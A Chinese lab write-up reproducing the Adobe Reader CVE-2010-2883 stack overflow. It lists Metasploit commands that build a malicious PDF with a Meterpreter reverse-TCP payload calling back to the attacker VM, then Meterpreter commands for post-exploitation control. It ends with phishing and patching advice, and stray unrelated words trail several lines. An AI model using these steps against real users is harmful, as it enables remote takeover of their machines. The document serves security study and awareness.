CVE-2010-2883漏洞復現

CVE-2010-2883漏洞復現

今天的漏洞復現,選了一個Adobe的一個有關打開pdf就會中招的漏洞。shell

1.原理

Adobe Reader在處理CoolType字體文件的sing表時,存在棧溢出漏洞,當打開特製的惡意PDF文件時,可容許任意代碼遠程執行。windows

2.影響版本

Adobe Reader 8.2.4 - 9.3.4微信

3.漏洞復現環境

Kali Linux + Windows 7 sp1 滲透機:Kali Linux (ip:192.168.95.140) 靶機:Windows 7 sp1 (ip:192.168.95.139) 軟件:Adobe Reader 9.0.exetcp

4.實操
因爲kali的metasploit集成了不少漏洞,所以咱們直接在metasploit上查找adobe_cooltype_sing漏洞進行復現
1.搜索search adobe_cooltype_sing模塊
2.調用滲透模塊
3.查看模板詳情

調用meterpreter載荷,反向鏈接到滲透機  
msf  exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp  
設置Kali Linux的IP地址  
msf  exploit(adobe_cooltype_sing) > set LHOST 192.168.95.140
設置本地監聽端口  
msf  exploit(adobe_cooltype_sing) > set LPORT 8888  
設置帶有後門程序的PDF文件  
msf  exploit(adobe_cooltype_sing) > set FILENAME test.pdf  
執行滲透生成文件  
msf  exploit(adobe_cooltype_sing) > exploit

將含有木馬的pdf文件拷貝到桌面 字體

Metasploit開啓shell監聽會話,等待肉雞上線 ui

在windows7上安裝Adobe Reader9.03d

將PDF木馬文件拷貝到Windows 7並打開 code

打開文件後,Metasploit獲取shell會話,並用Meterpreter控制肉雞 blog

查看系統信息  
meterpreter > sysinfo 
查看當前用戶  
meterpreter > getuid 
截屏  
meterpreter > screenshot

獲取進程  
meterpreter > ps  
切換進程
meterpreter > migrate 1548

獲取Dos Shell  
meterpreter > shell 
C:\Windows\system32>ipconfig

5.實驗總結
能夠看到,一旦電腦打開特殊定製的pdf以後,在沒有攔截的狀況下,直接變成肉雞。真實環境下,不少黑客會利用此方法,結合社會工程學,例如經過郵件、QQ羣、微信羣等多渠道,誘導用戶下載並打開。所以用戶在打開以前必定要明確文件來源,或者用殺毒軟件先殺毒,再打開。另外,就是儘可能保證電腦的軟件處於最新版,這樣才能最大程度下降被攻擊的概率。
6.漏洞修復
下載Adobe Reader最新版本。
安裝常見殺毒軟件,開啓實時防禦和殺毒引擎實時升級。
相關文章
相關標籤/搜索